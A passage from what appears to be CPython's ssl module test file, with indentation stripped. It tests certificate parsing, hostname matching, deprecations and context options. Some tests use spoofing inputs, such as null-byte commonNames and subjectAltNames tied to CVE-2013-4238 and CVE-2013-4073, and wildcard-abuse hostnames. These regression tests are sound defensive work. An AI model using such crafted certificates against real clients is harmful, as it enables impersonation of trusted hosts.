server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
if server_chain:
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_ssl_types(self):
ssl_types = [
_ssl._SSLContext,
_ssl._SSLSocket,
_ssl.MemoryBIO,
_ssl.Certificate,
_ssl.SSLSession,
_ssl.SSLError,
]
for ssl_type in ssl_types:
with self.subTest(ssl_type=ssl_type):
with self.assertRaisesRegex(TypeError, "immutable type"):
ssl_type.value = None
with self.assertRaisesRegex(
TypeError,
"cannot create '_ssl.Certificate' instances"
):
_ssl.Certificate()
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), 'PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_openssl111_deprecations(self):
options = [
ssl.OP_NO_TLSv1,
ssl.OP_NO_TLSv1_1,
ssl.OP_NO_TLSv1_2,
ssl.OP_NO_TLSv1_3
]
protocols = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
ssl.PROTOCOL_TLS
]
versions = [
ssl.TLSVersion.SSLv3,
ssl.TLSVersion.TLSv1,
ssl.TLSVersion.TLSv1_1,
]
for option in options:
with self.subTest(option=option):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.options |= option
self.assertEqual(
'ssl.OP_NO_SSL*/ssl.OP_NO_TLS* options are deprecated',
str(cm.warning)
)
for protocol in protocols:
with self.subTest(protocol=protocol):
with self.assertWarns(DeprecationWarning) as cm:
ssl.SSLContext(protocol)
self.assertEqual(
f'{protocol!r} is deprecated',
str(cm.warning)
)
for version in versions:
with self.subTest(version=version):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.minimum_version = version
self.assertEqual(
f'ssl.{version!r} is deprecated',
str(cm.warning)
)
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
